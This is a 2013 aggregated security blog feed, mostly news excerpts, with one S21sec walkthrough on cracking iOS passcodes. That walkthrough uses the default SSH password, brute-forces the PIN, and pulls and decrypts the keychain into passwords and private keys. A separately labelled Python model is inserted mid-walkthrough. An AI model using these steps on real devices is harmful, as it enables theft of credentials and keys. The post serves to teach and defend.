Security blogs

Some security blogs I follow
2013-07-01T21:55:27Z
Updated: 3 years 51 weeks ago

Symantec Reveals Global SMB IT Confidence Index

Mon, 06/24/2013 - 16:44
Findings show that SMBs with higher index scores are able to better manage increasing computing complexity while spending less on IT than those with lower scores (author unknown)
Categories: Bundle Security blogs

Spear Phishing Attack Against the <cite>Financial Times</cite>

Mon, 06/24/2013 - 16:38

Interesting story with a lot of details.

schneier
Categories: Bundle Security blogs

IC3 2012 Internet Crime Report Released

Mon, 06/24/2013 - 16:14
More Than 280,000 Complaints of Online Criminal Activity Reported in 2012 Fairmont, WV — Today the Internet Crime Complaint Center (IC3) released the 2012 Internet Crime Report—a summary of reported fraudulent activity, including data and statistics. In 2012, the IC3 received and processed 289,874 complaints, averaging more than 24,000 complaints per month. Unverified losses reported
noreply@blogger.com (Seguridad de la Información)
Categories: Bundle Security blogs

Ecuadorian police warn of an online scam that uses the institution's logo

Mon, 06/24/2013 - 13:09
The Ecuadorian police warned of the presence on the internet of a malicious virus that uses the institution's name and logo to defraud citizens, a crime that has also been reported in other countries. The "Virus de la Policía" is an online scam reported in Europe and Latin America. Photo: Policía Nacional. It is the "Virus de la Policía", a piece of software
noreply@blogger.com (Seguridad de la Información)
Categories: Bundle Security blogs

Kickstarter Debut: SnoopWall Stops Cyber Spying, Snooping, And Stealing

Mon, 06/24/2013 - 12:39
SnoopWall blocks remote access to mobile devices by protecting data-leakage ports (author unknown)
Categories: Bundle Security blogs

Sophos Launches Complete MSP Security

Mon, 06/24/2013 - 12:37
MSP-focused solution offers complete protection for networks, endpoints, and mobile devices (author unknown)
Categories: Bundle Security blogs

Start-Up Intros Memory Encryption To Secure Data In Use

Mon, 06/24/2013 - 12:33
PrivateCore vCage software protects data in use with full memory encryption (author unknown)
Categories: Bundle Security blogs

McAfee Report Reveals Businesses Failing To Harness Big Security Data To Protect Against Threats

Mon, 06/24/2013 - 12:17
Only 35 percent of businesses say they can actually detect security breaches within minutes (author unknown)
Categories: Bundle Security blogs

Cracking iOS PassCode

Mon, 06/24/2013 - 05:10
A few months ago, in a previous post, we described how iOS Data Protection works to protect credentials, and which of them remain automatically accessible even without the PassCode because they use the "Always" or "AfterFirstUnlock" classes. But... what happens if the PassCode is overly trivial? How much does a PassCode like "1234" protect you?
If you have ever entered the wrong password on an iOS device, you will have noticed that after a certain number of failed attempts it imposes a waiting period that grows with each further mistake. This is a fairly effective security measure against dictionary or brute-force attacks. However, in iOS this measure is implemented in the user interface itself, not in the KeyChain internals, so its effectiveness rests on the attacker having no access to the device other than through the touch-screen interface.
Can we reach these devices by other means? Yes: we may have gained access because the device is jailbroken and the SSH password has not been changed (root:alpine), for example, or by exploiting some vulnerability, whether one that needs user interaction, as with Jail0wnme, or a bootloader vulnerability such as limera1n.
If we have gained access to the device by any of these means, we can use the services and tools that are part of iphone-dataprotection to launch a brute-force attack "from the inside", which lets us sidestep the protections iOS has in its interface.
If we download and compile the iphone-dataprotection binaries, we get a directory called "ramdisk_tools", which holds the tools that go into the RamDisk when exploiting limera1n, but which of course can be used with any other kind of access. I will use a jailbroken iPad with SSH root:alpine, but the same could be done, for example, by downloading the same binary from somewhere after having obtained a remote shell:
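The paragraph on the escalating lockout is the security-relevant point of this post: the throttle lives in the user interface, so an attacker who can reach the keybag over SSH never meets it and is bounded only by the keyspace and the per-attempt cost of the device's key derivation. The model below, an added illustration that is not code from the S21sec post or from iphone-dataprotection, makes that difference concrete. Every number in it (UI_FREE_ATTEMPTS, UI_LOCKOUT_SECONDS, INSIDE_SECONDS_PER_ATTEMPT) is a constructed assumption chosen to show the shape of the problem, not a measurement of any iOS release:

```python
"""Passcode work-factor model for the two attacker positions discussed above.

Added illustration, not code from the S21sec post or from iphone-dataprotection.
All numbers (UI lockout schedule, per-attempt cost of a keybag unlock) are
constructed assumptions, not measurements of any iOS release.
"""

# Constructed UI lockout schedule: the first few failures are free, then every
# further failure waits, with the wait growing and finally staying at the last
# value. Assumed values, not Apple's real timers.
UI_FREE_ATTEMPTS = 5
UI_LOCKOUT_SECONDS = (60, 300, 900, 3600)

# Assumed cost of one passcode check when the attacker drives the keybag
# directly over a shell: only the device-bound key derivation slows each
# attempt, because the lockout lives in the UI and is never reached.
INSIDE_SECONDS_PER_ATTEMPT = 0.08


def keyspace(length, alphabet_size):
    """Number of candidate passcodes of a given length over an alphabet."""
    return alphabet_size ** length


def expected_attempts(space):
    """Average guesses before the right passcode turns up: half the keyspace."""
    return space // 2


def ui_seconds(attempts):
    """Wall-clock seconds to submit `attempts` guesses through the touch screen.

    Closed form, so very large keyspaces do not need a loop.
    """
    if attempts <= UI_FREE_ATTEMPTS:
        return 0
    locked = attempts - UI_FREE_ATTEMPTS
    escalating = sum(UI_LOCKOUT_SECONDS[:locked])
    steady = max(0, locked - len(UI_LOCKOUT_SECONDS)) * UI_LOCKOUT_SECONDS[-1]
    return escalating + steady


def inside_seconds(attempts, per_attempt=INSIDE_SECONDS_PER_ATTEMPT):
    """Seconds for the same guesses issued directly against the keybag."""
    return attempts * per_attempt


def compare(length, alphabet_size):
    """Expected attack time (seconds) for both attacker positions."""
    space = keyspace(length, alphabet_size)
    n = expected_attempts(space)
    return {
        "keyspace": space,
        "ui_seconds": ui_seconds(n),
        "inside_seconds": inside_seconds(n),
    }


if __name__ == "__main__":
    for label, length, alphabet in (("4-digit PIN", 4, 10),
                                    ("6-digit PIN", 6, 10),
                                    ("8-char alphanumeric", 8, 62)):
        r = compare(length, alphabet)
        print(f"{label:22} keyspace={r['keyspace']:>18,} "
              f"via UI={r['ui_seconds'] / 86400:>14,.1f} days "
              f"from inside={r['inside_seconds'] / 3600:>12,.1f} hours")
```

Under these assumed numbers a 4-digit PIN takes months through the interface but minutes from a shell, while a 6-digit PIN still falls in hours from the inside. The defender's reading is that a throttle enforced by the UI protects nothing once the attacker has another path to the keybag; what remains is the keyspace and the per-attempt cost, which is why a longer passcode and a throttle anchored in the key derivation or hardware are the mitigations that matter.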
$ scp ramdisk_tools/bruteforce root@192.168.1.109:
$ ssh root@192.168.1.109
root@192.168.1.109's password: alpine
S21Pad:~ root#

Once inside, we can run the binary with no arguments and it will brute-force every 4-digit PIN:
# ./bruteforce   
Writing results to 7b93c4e7f008a64b.plist
keybag id=1
0000
0001
[...]
0020
0021
Found passcode : 0021
Keybag version : 3
Keybag keys : 10
Class Wrap Key
11 0 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
10 0 bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
9 0 ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
8 0 dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
7 0 11111111111111111111111111111111111111111111111111111111111111
6 0 22222222222222222222222222222222222222222222222222222222222222
5 0 33333333333333333333333333333333333333333333333333333333333333
3 0 44444444444444444444444444444444444444444444444444444444444444
2 0 55555555555555555555555555555555555555555555555555555555555555
1 0 66666666666666666666666666666666666666666666666666666666666666

Passcode key : beefbeefbeefbeefbeefbeefbeefbeefbeefbeefbeefbeefbeefbeefbeefbeefbeef
Key 0x835 : f00f00f00f00f00f00f00f00f00f00f00f
Writing results to 7b93c4e7f008a64b.plist

Forgive me for hiding the extracted keys: they are the keys that encrypt the information, and if you had them you could decrypt the KeyChain or the files even if I changed the PassCode in the future, unless I restored the device to factory settings.
The keys needed for decryption are written to a PLIST file, so now we need to pull that PLIST and the KeyChain itself off the iPad and decrypt. This is possible because the brute-force attack has already given us the real encryption keys, so nothing further has to be computed on the device.
$ scp root@192.168.1.109:/private/var/Keychains/keychain-2.db .
$ scp root@192.168.1.109:7b93c4e7f008a64b.plist .

Now that we have the encrypted KeyChain and the keys, we only have to use another of the tools in this suite to decrypt the contents:
$ python python_scripts/keychain_tool.py -d keychain-2.db 7b93c4e7f008a64b.plist 
Keybag unlocked with passcode key
[...]
---------------------------------------------------------------------------------------------------
|                                                         Passwords                                                               |
---------------------------------------------------------------------------------------------------
|Service               |Account            |Data       |Access group     |Protection class              |
---------------------------------------------------------------------------------------------------
|push.apple.com  |                         |>8***** |com.apple.apsd |AlwaysThisDeviceOnly  |
|AirPort               |WLAN_72AF  |46***** |apple                  |AfterFirstUnlock             |
|AirPort               |Lemonparty     |89***** |apple                  |AfterFirstUnlock             |
|_LineUserInfo    |region              |ES           |ZW4U99SQQ3 |WhenUnlocked               |
|AirPort               |S21sec              |no****    |apple                |AfterFirstUnlock             |
|AirPort               |WLAN_8D       |Z0****    |apple               |AfterFirstUnlock              |
---------------------------------------------------------------------------------------------------

This shows us, as in the previous post, the stored credentials, except that now it also shows those saved with the "WhenUnlocked" class, which in this case are few or none. The difference becomes clear if we dump the stored certificates, because this time we can also dump the certificates' private keys:
$ python python_scripts/keychain_tool.py -c keychain-2.db 7b93c4e7f008a64b.plist
Keybag unlocked with passcode key
Saving certificate com.apple.ubiquity.peer-uuid.738C1396-D023-4D7D-9E11-806FF5331CDB_com.apple.ubd.crt
Saving certificate 74C7946F-0525-445B-A24E-4FBC74E8F589_lockdown-identities.crt
Saving certificate broker.banco.com_com.apple.certificates.crt
Saving certificate 74C7946F-0525-445B-A24E-4FBC74E8F589_com.apple.apsd.crt
Saving key com.apple.ubiquity.peer-uuid.738C1396-D023-4D7D-9E11-806FF5331CDB_com.apple.ubd.key
Saving key 74C7946F-0525-445B-A24E-4FBC74E8F589_lockdown-identities.key
Saving key 74C7946F-0525-445B-A24E-4FBC74E8F589_com.apple.apsd.key

Of course, we can also use the PassCode to access the device through the interface, unlock it, remove the PassCode... in short, anything we want.

Jose Selvi, Professional Services Department, S21sec
Twitter / Blog
noreply@blogger.com (S21sec Labs)
Categories: Bundle Security blogs

Malwarebytes unveils ExploitShield-based Anti-Exploit Beta

Mon, 06/24/2013 - 00:39

Malwarebytes has released the first public beta of Malwarebytes Anti-Exploit, a rebranded and improved version of ZeroVulnerabilityLabs’ ExploitShield.

Just as in its previous incarnation, Anti-Exploit is an extremely easy-to-use tool which protects popular applications from zero-day exploits, web-based vulnerability exploits and more.

Tags: Software-Programming, Viruses & Malware (l33tdawg)
Categories: Bundle Security blogs

NSA hacked Pacnet, Chinese telcos: Snowden

Mon, 06/24/2013 - 00:37

Former United States National Security Agency (NSA) employee turned whistleblower Edward Snowden has reportedly revealed attacks by his former employer on network operator Pacnet.

Speaking to Hong Kong's South China Morning Post, Snowden said Pacnet's computers in Hong Kong were attacked by America but did not provide information as to the motive nor whether Pacnet suffered any damage in the now-closed hacking operation.

Tags: NSA, China, Security, PRISM, Industry News (l33tdawg)
Categories: Bundle Security blogs

Yahoo rejects ID hacker fears

Mon, 06/24/2013 - 00:35

Yahoo has downplayed concerns that its plans to recycle inactive user IDs could leave users exposed to hackers, saying only 7 per cent of those IDs are tied to actual Yahoo email accounts.

The internet company, which announced last week it would release user IDs that have been inactive for more than 12 months so that other people can claim them, was pressed to defend the plan after critics warned that hackers who take control of inactive accounts could also assume the identities of the accounts' previous owners.

Tags: Yahoo, Security (l33tdawg)
Categories: Bundle Security blogs

How to run your own NSA spy program

Mon, 06/24/2013 - 00:33

Everybody's talking about PRISM, the U.S. government's electronic surveillance program.

We don't know all the details about PRISM (also called US-984XN). But we learned enough from a badly designed PowerPoint presentation leaked by NSA contractor Edward Snowden to feel outraged by its reach and audacity. In a nutshell, PRISM (and related telephone surveillance programs) take a big data approach to spying on foreign terrorists using American servers.

Tags: NSA, PRISM, Security, Privacy (l33tdawg)
Categories: Bundle Security blogs

California sends a cease and desist order to the Bitcoin Foundation

Mon, 06/24/2013 - 00:32

California's Department of Financial Institutions has issued a cease and desist letter to the Bitcoin Foundation for "allegedly engaging in the business of money transmission without a license or proper authorization," according to Forbes. The news comes after Bitcoin held its "Future of Payments" conference in San Jose last month. (The license information is available on CA.gov and Forbes placed the cease and desist letter on Scribd.)

Tags: US, BitCoin, Law and Order (l33tdawg)
Categories: Bundle Security blogs

FTC to cast an eye over Google's Waze buy

Mon, 06/24/2013 - 00:30

Google's acquisition of Israeli mobile navigation app vendor Waze is going to get an anti-trust examination by the FTC.

Earlier this month, Mountain View's acquisition team flipped open the wallet to the tune of $US1.3 billion for the social map app, its sub-$US70 million revenue, and its claimed fifty million users. When the Chocolate Factory made its buy, Waze was also attracting the interest of Apple and Facebook.

Tags: FTC, Google, Waze (l33tdawg)
Categories: Bundle Security blogs

Facebook bug exposes contact information from millions of users

Mon, 06/24/2013 - 00:29

A bug on Facebook leaked email addresses and phone numbers provided by some 6 million people on the site to certain other users, the company revealed Friday.

What sparked the problem is a bit complicated. The bug caused some of the information that the social network stores to make friend recommendations to be inadvertently stored in association with people's contact information as part of their Facebook account, the company said Friday on its website.

Tags: Facebook, Security, Privacy (l33tdawg)
Categories: Bundle Security blogs

NSA leaker Snowden leaves Hong Kong reportedly for Russia

Mon, 06/24/2013 - 00:28

Edward Snowden, the former U.S. National Security Agency contractor who leaked information about the country's surveillance programs, left Hong Kong Sunday to a third country.

Snowden left Hong Kong on his own accord for a third country through "a lawful and normal channel," despite an earlier request from the U.S. to Hong Kong for the issue of a provisional warrant of arrest against him, the Hong Kong government said in a statement Sunday. The Hong Kong authorities did not name the country Snowden was headed to.

Tags: NSA, PRISM, US, Industry News (l33tdawg)
Categories: Bundle Security blogs

Simple ways to enhance your Internet privacy

Mon, 06/24/2013 - 00:26

Recent disclosures of U.S. government surveillance of our phone and Internet activity have heightened interest in services that promise not to collect or share our personal information.

Tags: Privacy (l33tdawg)
Categories: Bundle Security blogs

MySQL mistake is a wake-up call on open source ownership

Sun, 06/23/2013 - 23:48

There was a moment of panic in the open source community this week when a developer on the MariaDB fork of MySQL discovered that Oracle had quietly changed the license on all the man pages for MySQL from GPL to a restrictive proprietary license two months earlier. Prompted by the bug report, Oracle's staff quickly discovered that an error had been made in the build system and promised to immediately undo the change and restore the GPL to all of MySQL. Problem solved!

Tags: MySQL, Industry News (l33tdawg)
Categories: Bundle Security blogs

Sun Emits a Solstice CME

Sun, 06/23/2013 - 23:45

On June 20, 2013, at 11:24 p.m., the sun erupted with an Earth-directed coronal mass ejection or CME, a solar phenomenon that can send billions of tons of particles into space that can reach Earth one to three days later. These particles cannot travel through the atmosphere to harm humans on Earth, but they can affect electronic systems in satellites and on the ground.

Tags: Science (l33tdawg)
Categories: Bundle Security blogs